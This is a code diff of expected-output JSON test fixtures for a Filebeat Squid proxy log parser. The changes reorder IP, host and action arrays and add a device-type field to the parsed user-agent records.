@@ -4626,8 +4626,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_DENIED", - "GET" + "GET", + "TCP_DENIED" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", @@ -4746,8 +4746,8 @@ "us.news1.yimg.com" ], "related.ip": [ - "213.160.98.159", - "10.105.33.214" + "10.105.33.214", + "213.160.98.159" ], "related.user": [ "adeolaegbedokun" @@ -4758,8 +4758,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "image/jpeg", "rsa.misc.result_code": "200", @@ -4886,8 +4886,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "68.142.219.132", - "10.105.33.214" + "10.105.33.214", + "68.142.219.132" ], "related.user": [ "adeolaegbedokun" @@ -4959,8 +4959,8 @@ "us.a2.yimg.com" ], "related.ip": [ - "213.160.98.152", - "10.105.33.214" + "10.105.33.214", + "213.160.98.152" ], "related.user": [ "adeolaegbedokun" @@ -5029,8 +5029,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "68.142.219.132", - "10.105.33.214" + "10.105.33.214", + "68.142.219.132" ], "related.user": [ "adeolaegbedokun" @@ -5041,8 +5041,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "200", @@ -5097,8 +5097,8 @@ "us.bc.yahoo.com" ], "related.ip": [ - "68.142.213.132", - "10.105.33.214" + "10.105.33.214", + "68.142.213.132" ], "related.user": [ "adeolaegbedokun" @@ -5177,8 +5177,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "200", 
@@ -5232,8 +5232,8 @@ "pclick.internal.yahoo.com" ], "related.ip": [ - "216.109.124.55", - "10.105.33.214" + "10.105.33.214", + "216.109.124.55" ], "related.user": [ "adeolaegbedokun" @@ -5448,8 +5448,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_MISS" + "TCP_MISS", + "GET" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "304", @@ -5505,8 +5505,8 @@ "login.yahoo.com" ], "related.ip": [ - "10.105.21.199", - "209.73.177.115" + "209.73.177.115", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -5516,8 +5516,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "CONNECT", - "TCP_MISS" + "TCP_MISS", + "CONNECT" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "200", @@ -5650,8 +5650,8 @@ "a1568.g.akamai.net" ], "related.ip": [ - "10.105.33.214", - "213.160.98.159" + "213.160.98.159", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -5782,8 +5782,8 @@ "a1568.g.akamai.net" ], "related.ip": [ - "213.160.98.167", - "10.105.33.214" + "10.105.33.214", + "213.160.98.167" ], "related.user": [ "adeolaegbedokun" @@ -5855,8 +5855,8 @@ "a1568.g.akamai.net" ], "related.ip": [ - "10.105.33.214", - "213.160.98.159" + "213.160.98.159", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -5940,8 +5940,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_MISS" + "TCP_MISS", + "GET" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "304", @@ -5999,8 +5999,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_DENIED" + "TCP_DENIED", + "GET" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", 
@@ -6114,8 +6114,8 @@ "launch.adserver.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "216.109.125.112" + "216.109.125.112", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -6126,8 +6126,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "200", @@ -6184,8 +6184,8 @@ "uk.f250.mail.yahoo.com" ], "related.ip": [ - "10.105.21.199", - "217.12.10.96" + "217.12.10.96", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -6196,8 +6196,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "200", @@ -6314,8 +6314,8 @@ "us.js2.yimg.com" ], "related.ip": [ - "213.160.98.169", - "10.105.21.199" + "10.105.21.199", + "213.160.98.169" ], "related.user": [ "badeyek" @@ -6326,8 +6326,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_SWAPFAIL_MISS" + "TCP_SWAPFAIL_MISS", + "GET" ], "rsa.misc.content_type": "application/x-javascript", "rsa.misc.result_code": "200", @@ -6385,8 +6385,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_HIT", - "GET" + "GET", + "TCP_HIT" ], "rsa.misc.content_type": "text/css", "rsa.misc.result_code": "200", @@ -6458,8 +6458,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "application/x-javascript", "rsa.misc.result_code": "200", diff --git a/x-pack/filebeat/module/squid/log/test/generated.log-expected.json b/x-pack/filebeat/module/squid/log/test/generated.log-expected.json index 0613980f3e6..39d375f0690 100644 
--- a/x-pack/filebeat/module/squid/log/test/generated.log-expected.json +++ b/x-pack/filebeat/module/squid/log/test/generated.log-expected.json @@ -22,16 +22,16 @@ "example.net" ], "related.ip": [ - "10.251.224.219", - "10.234.224.44" + "10.234.224.44", + "10.251.224.219" ], "related.user": [ "tation" ], "rsa.internal.messageid": "PROPFIND", "rsa.misc.action": [ - "PROPFIND", - "deny" + "deny", + "PROPFIND" ], "rsa.misc.content_type": "ciade", "rsa.misc.result_code": "liqua", @@ -61,6 +61,7 @@ "url.top_level_domain": "org", "user.name": "tation", "user_agent.device.name": "Samsung SM-A715F", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]", "user_agent.os.full": "Android 10", @@ -91,16 +92,16 @@ "example.com" ], "related.ip": [ - "10.70.36.222", - "10.102.123.34" + "10.102.123.34", + "10.70.36.222" ], "related.user": [ "doeiu" ], "rsa.internal.messageid": "PURGE", "rsa.misc.action": [ - "PURGE", - "deny" + "deny", + "PURGE" ], "rsa.misc.content_type": "volup", "rsa.misc.result_code": "olupt", @@ -132,6 +133,7 @@ "url.top_level_domain": "org", "user.name": "doeiu", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -158,8 +160,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.net", - "internal.example.com" + "internal.example.com", + "example.net" ], "related.ip": [ "10.142.172.64", 
@@ -203,6 +205,7 @@ "url.top_level_domain": "com", "user.name": "tia", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -240,8 +243,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "allow", - "GET" + "GET", + "allow" ], "rsa.misc.content_type": "taev", "rsa.misc.result_code": "quiavo", @@ -273,6 +276,7 @@ "url.subdomain": "api", "url.top_level_domain": "org", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -311,8 +315,8 @@ ], "rsa.internal.messageid": "PUT", "rsa.misc.action": [ - "PUT", - "cancel" + "cancel", + "PUT" ], "rsa.misc.content_type": "aquaeabi", "rsa.misc.result_code": "laboreet", @@ -344,6 +348,7 @@ "url.top_level_domain": "org", "user.name": "onev", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -374,8 +379,8 @@ "api.example.com" ], "related.ip": [ - "10.175.107.139", - "10.12.195.60" + "10.12.195.60", + "10.175.107.139" ], "related.user": [ "mrema" 
@@ -418,6 +423,7 @@ "url.top_level_domain": "org", "user.name": "mrema", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -444,8 +450,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.com", - "www.example.org" + "www.example.org", + "www5.example.com" ], "related.ip": [ "10.207.249.121", @@ -489,6 +495,7 @@ "url.top_level_domain": "com", "user.name": "tsed", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -515,8 +522,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.org", - "internal.example.net" + "internal.example.net", + "example.org" ], "related.ip": [ "10.34.9.93", @@ -558,6 +565,7 @@ "url.top_level_domain": "org", "user.name": "umdo", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -584,12 +592,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.org", - "mail.example.net" + "mail.example.net", + "example.org" ], "related.ip": [ - "10.90.131.186", - "10.30.216.41" + "10.30.216.41", + "10.90.131.186" ], "related.user": [ "saute" 
@@ -599,8 +607,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "HEAD", - "accept" + "accept", + "HEAD" ], "rsa.misc.content_type": "undeo", "rsa.misc.result_code": "quu", @@ -630,6 +638,7 @@ "url.top_level_domain": "org", "user.name": "saute", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -660,8 +669,8 @@ "www5.example.org" ], "related.ip": [ - "10.203.172.203", - "10.8.88.110" + "10.8.88.110", + "10.203.172.203" ], "related.user": [ "Nemoeni" @@ -703,6 +712,7 @@ "url.top_level_domain": "org", "user.name": "Nemoeni", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -773,6 +783,7 @@ "url.top_level_domain": "org", "user.name": "aliq", "user_agent.device.name": "XiaoMi Redmi 4X", + "user_agent.device.type": "Phone", "user_agent.name": "MiuiBrowser", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g", "user_agent.os.full": "Android 7.1.2", @@ -799,12 +810,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "internal.example.net", - "example.net" + "example.net", + "internal.example.net" ], "related.ip": [ - "10.201.76.240", - "10.210.74.24" + "10.210.74.24", + "10.201.76.240" ], "related.user": [ "uines" 
@@ -844,6 +855,7 @@ "url.top_level_domain": "net", "user.name": "uines", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -878,8 +890,8 @@ ], "rsa.internal.messageid": "COPY", "rsa.misc.action": [ - "COPY", - "deny" + "deny", + "COPY" ], "rsa.misc.content_type": "eli", "rsa.misc.result_code": "tatn", @@ -911,6 +923,7 @@ "url.top_level_domain": "org", "user.name": "xeac", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -982,6 +995,7 @@ "url.top_level_domain": "org", "user.name": "ipitla", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -1053,6 +1067,7 @@ "url.top_level_domain": "org", "user.name": "aturve", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", 
@@ -1083,16 +1098,16 @@ "internal.example.net" ], "related.ip": [ - "10.249.213.83", - "10.164.250.63" + "10.164.250.63", + "10.249.213.83" ], "related.user": [ "itame" ], "rsa.internal.messageid": "PROPFIND", "rsa.misc.action": [ - "accept", - "PROPFIND" + "PROPFIND", + "accept" ], "rsa.misc.content_type": "asun", "rsa.misc.result_code": "lit", @@ -1124,6 +1139,7 @@ "url.top_level_domain": "net", "user.name": "itame", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -1150,12 +1166,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.net", - "www5.example.net" + "www5.example.net", + "api.example.net" ], "related.ip": [ - "10.61.242.75", - "10.236.248.65" + "10.236.248.65", + "10.61.242.75" ], "related.user": [ "iquidex" @@ -1198,6 +1214,7 @@ "url.top_level_domain": "net", "user.name": "iquidex", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1236,8 +1253,8 @@ ], "rsa.internal.messageid": "PUT", "rsa.misc.action": [ - "block", - "PUT" + "PUT", + "block" ], "rsa.misc.content_type": "eprehend", "rsa.misc.result_code": "boN", 
@@ -1269,6 +1286,7 @@ "url.top_level_domain": "com", "user.name": "etdol", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1299,8 +1317,8 @@ "internal.example.net" ], "related.ip": [ - "10.89.201.140", - "10.49.92.179" + "10.49.92.179", + "10.89.201.140" ], "related.user": [ "isnisiu" @@ -1310,8 +1328,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "accept", - "GET" + "GET", + "accept" ], "rsa.misc.content_type": "tcons", "rsa.misc.result_code": "tsu", @@ -1343,6 +1361,7 @@ "url.top_level_domain": "net", "user.name": "isnisiu", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -1369,12 +1388,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "mail.example.net", - "api.example.org" + "api.example.org", + "mail.example.net" ], "related.ip": [ - "10.235.7.92", - "10.90.86.89" + "10.90.86.89", + "10.235.7.92" ], "related.user": [ "lapar" @@ -1414,6 +1433,7 @@ "url.top_level_domain": "org", "user.name": "lapar", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", 
@@ -1444,16 +1464,16 @@ "www5.example.net" ], "related.ip": [ - "10.14.211.43", - "10.14.48.16" + "10.14.48.16", + "10.14.211.43" ], "related.user": [ "volupt" ], "rsa.internal.messageid": "PROPFIND", "rsa.misc.action": [ - "cancel", - "PROPFIND" + "PROPFIND", + "cancel" ], "rsa.misc.content_type": "Utenima", "rsa.misc.result_code": "uiinea", @@ -1485,6 +1505,7 @@ "url.top_level_domain": "org", "user.name": "volupt", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -1511,8 +1532,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "internal.example.net", - "example.com" + "example.com", + "internal.example.net" ], "related.ip": [ "10.93.123.174", @@ -1525,8 +1546,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "CONNECT", - "block" + "block", + "CONNECT" ], "rsa.misc.content_type": "iusmodi", "rsa.misc.result_code": "etcons", @@ -1558,6 +1579,7 @@ "url.top_level_domain": "net", "user.name": "reetdolo", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", 
@@ -1629,6 +1651,7 @@ "url.top_level_domain": "net", "user.name": "tlab", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -1655,20 +1678,20 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "mail.example.com", - "api.example.net" + "api.example.net", + "mail.example.com" ], "related.ip": [ - "10.27.58.92", - "10.93.220.10" + "10.93.220.10", + "10.27.58.92" ], "related.user": [ "qui" ], "rsa.internal.messageid": "PROPATCH", "rsa.misc.action": [ - "PROPATCH", - "accept" + "accept", + "PROPATCH" ], "rsa.misc.content_type": "squirati", "rsa.misc.result_code": "Nemoenim", @@ -1700,6 +1723,7 @@ "url.top_level_domain": "net", "user.name": "qui", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -1726,12 +1750,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.net", - "example.net" + "example.net", + "www.example.net" ], "related.ip": [ - "10.213.144.249", - "10.135.217.12" + "10.135.217.12", + "10.213.144.249" ], "related.user": [ "ntexplic" @@ -1771,6 +1795,7 @@ "url.top_level_domain": "net", "user.name": "ntexplic", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", 
@@ -1797,8 +1822,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "mail.example.net", - "internal.example.com" + "internal.example.com", + "mail.example.net" ], "related.ip": [ "10.233.239.112", @@ -1842,6 +1867,7 @@ "url.top_level_domain": "net", "user.name": "mquelau", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -1868,8 +1894,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.com", - "internal.example.org" + "internal.example.org", + "example.com" ], "related.ip": [ "10.21.169.127", @@ -1882,8 +1908,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "CONNECT", - "accept" + "accept", + "CONNECT" ], "rsa.misc.content_type": "seq", "rsa.misc.result_code": "edic", @@ -1915,6 +1941,7 @@ "url.top_level_domain": "org", "user.name": "ice", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1941,20 +1968,20 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.net", - "api.example.com" + "api.example.com", + "www.example.net" ], "related.ip": [ - "10.17.215.111", - "10.69.139.26" + "10.69.139.26", + "10.17.215.111" ], "related.user": [ "edqui" ], "rsa.internal.messageid": "LOCK", "rsa.misc.action": [ - "block", - "LOCK" + "LOCK", + "block" ], "rsa.misc.content_type": "volupta", "rsa.misc.result_code": "veli", 
@@ -1986,6 +2013,7 @@ "url.top_level_domain": "net", "user.name": "edqui", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -2016,16 +2044,16 @@ "www5.example.org" ], "related.ip": [ - "10.104.80.189", - "10.10.213.83" + "10.10.213.83", + "10.104.80.189" ], "related.user": [ "onsecte" ], "rsa.internal.messageid": "COPY", "rsa.misc.action": [ - "accept", - "COPY" + "COPY", + "accept" ], "rsa.misc.content_type": "onulam", "rsa.misc.result_code": "ugiat", @@ -2057,6 +2085,7 @@ "url.top_level_domain": "org", "user.name": "onsecte", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2083,8 +2112,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.org", - "example.org" + "example.org", + "api.example.org" ], "related.ip": [ "10.125.131.91", @@ -2095,8 +2124,8 @@ ], "rsa.internal.messageid": "UNLOCK", "rsa.misc.action": [ - "block", - "UNLOCK" + "UNLOCK", + "block" ], "rsa.misc.content_type": "emUteni", "rsa.misc.result_code": "utlab", @@ -2126,6 +2155,7 @@ "url.top_level_domain": "org", "user.name": "isis", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", 
@@ -2195,6 +2225,7 @@ "url.top_level_domain": "com", "user.name": "oraincid", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -2221,12 +2252,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.net", - "mail.example.com" + "mail.example.com", + "api.example.net" ], "related.ip": [ - "10.0.98.205", - "10.76.110.144" + "10.76.110.144", + "10.0.98.205" ], "related.user": [ "upt" @@ -2269,6 +2300,7 @@ "url.top_level_domain": "net", "user.name": "upt", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -2340,6 +2372,7 @@ "url.top_level_domain": "org", "user.name": "xeaco", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -2369,8 +2402,8 @@ "internal.example.org" ], "related.ip": [ - "10.27.44.4", - "10.154.53.249" + "10.154.53.249", + "10.27.44.4" ], "related.user": [ "autodit" 
